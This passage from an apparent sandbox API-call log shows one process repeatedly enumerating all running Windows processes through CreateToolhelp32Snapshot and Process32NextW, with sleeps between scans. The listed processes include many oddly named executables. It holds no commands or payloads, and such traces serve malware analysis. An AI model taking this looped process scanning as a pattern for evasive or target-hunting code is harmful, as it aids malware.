lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.353] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.356] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0148.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0148.377] CloseHandle (hObject=0xbc) returned 1 [0148.377] Sleep (dwMilliseconds=0x12c) [0148.687] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.693] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0148.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.696] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.697] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.700] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.705] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0148.706] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.707] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.712] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.713] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.714] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.717] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0148.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.718] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.719] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.721] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.722] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.724] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0148.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.784] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.787] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.790] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.792] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.794] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.795] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.796] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.800] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.804] CloseHandle (hObject=0xc4) returned 1 [0148.804] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.809] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0148.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.812] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.816] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.817] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.851] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.852] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.854] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.855] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.855] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.856] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, 